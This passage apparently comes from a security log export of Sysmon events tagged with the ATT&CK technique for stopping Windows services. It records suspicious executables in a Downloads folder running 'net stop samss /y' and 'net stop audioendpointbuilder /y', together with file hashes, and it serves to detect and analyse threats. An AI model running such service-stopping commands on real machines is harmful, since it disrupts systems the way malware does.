MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:17.242013300Z"",""eventRecordID"":""1190"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:17.120\r\nProcessGuid: {df9fc3d3-d209-5ec7-0000-0010e9843c00}\r\nProcessId: 225820\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:17.120"",""processGuid"":""{df9fc3d3-d209-5ec7-0000-0010e9843c00}"",""processId"":""225820"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:40:32.433",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:07.779 +ProcessGuid: {df9fc3d3-d1ff-5ec7-0000-0010057c3b00} +ProcessId: 204716 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1fd-5ec7-0000-001009443b00} +ParentProcessId: 201476 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:07.814769400Z"",""eventRecordID"":""1167"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:07.779\r\nProcessGuid: {df9fc3d3-d1ff-5ec7-0000-0010057c3b00}\r\nProcessId: 204716\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1fd-5ec7-0000-001009443b00}\r\nParentProcessId: 201476\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:07.779"",""processGuid"":""{df9fc3d3-d1ff-5ec7-0000-0010057c3b00}"",""processId"":""204716"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1fd-5ec7-0000-001009443b00}"",""parentProcessId"":""201476"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:40:28.230",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:06.014 +ProcessGuid: {df9fc3d3-d1fe-5ec7-0000-0010cb4c3b00} +ProcessId: 201768 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1fd-5ec7-0000-00109a313b00} +ParentProcessId: 200892 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:06.117466600Z"",""eventRecordID"":""1165"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:06.014\r\nProcessGuid: {df9fc3d3-d1fe-5ec7-0000-0010cb4c3b00}\r\nProcessId: 201768\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1fd-5ec7-0000-00109a313b00}\r\nParentProcessId: 200892\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:06.014"",""processGuid"":""{df9fc3d3-d1fe-5ec7-0000-0010cb4c3b00}"",""processId"":""201768"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1fd-5ec7-0000-00109a313b00}"",""parentProcessId"":""200892"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:40:28.222",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:05.808 +ProcessGuid: {df9fc3d3-d1fd-5ec7-0000-001009443b00} +ProcessId: 201476 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:05.896730100Z"",""eventRecordID"":""1164"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:05.808\r\nProcessGuid: {df9fc3d3-d1fd-5ec7-0000-001009443b00}\r\nProcessId: 201476\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:05.808"",""processGuid"":""{df9fc3d3-d1fd-5ec7-0000-001009443b00}"",""processId"":""201476"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:40:28.209",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:22:05.462 +ProcessGuid: {df9fc3d3-d1fd-5ec7-0000-00109a313b00} +ProcessId: 200892 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:05.468573000Z"",""eventRecordID"":""1163"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:22:05.462\r\nProcessGuid: {df9fc3d3-d1fd-5ec7-0000-00109a313b00}\r\nProcessId: 200892\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:22:05.462"",""processGuid"":""{df9fc3d3-d1fd-5ec7-0000-00109a313b00}"",""processId"":""200892"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:40:11.484",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:58.722 +ProcessGuid: {df9fc3d3-d1f6-5ec7-0000-0010aeda3900} +ProcessId: 183508 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001033d13900} +ParentProcessId: 182656 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.752503600Z"",""eventRecordID"":""1160"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:58.722\r\nProcessGuid: {df9fc3d3-d1f6-5ec7-0000-0010aeda3900}\r\nProcessId: 183508\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001033d13900}\r\nParentProcessId: 182656\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:58.722"",""processGuid"":""{df9fc3d3-d1f6-5ec7-0000-0010aeda3900}"",""processId"":""183508"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1f6-5ec7-0000-001033d13900}"",""parentProcessId"":""182656"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:40:11.437",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:58.426 +ProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001074d43900} +ProcessId: 183044 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001000cb3900} +ParentProcessId: 182144 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.430889200Z"",""eventRecordID"":""1159"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:58.426\r\nProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001074d43900}\r\nProcessId: 183044\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1f6-5ec7-0000-001000cb3900}\r\nParentProcessId: 182144\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:58.426"",""processGuid"":""{df9fc3d3-d1f6-5ec7-0000-001074d43900}"",""processId"":""183044"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John 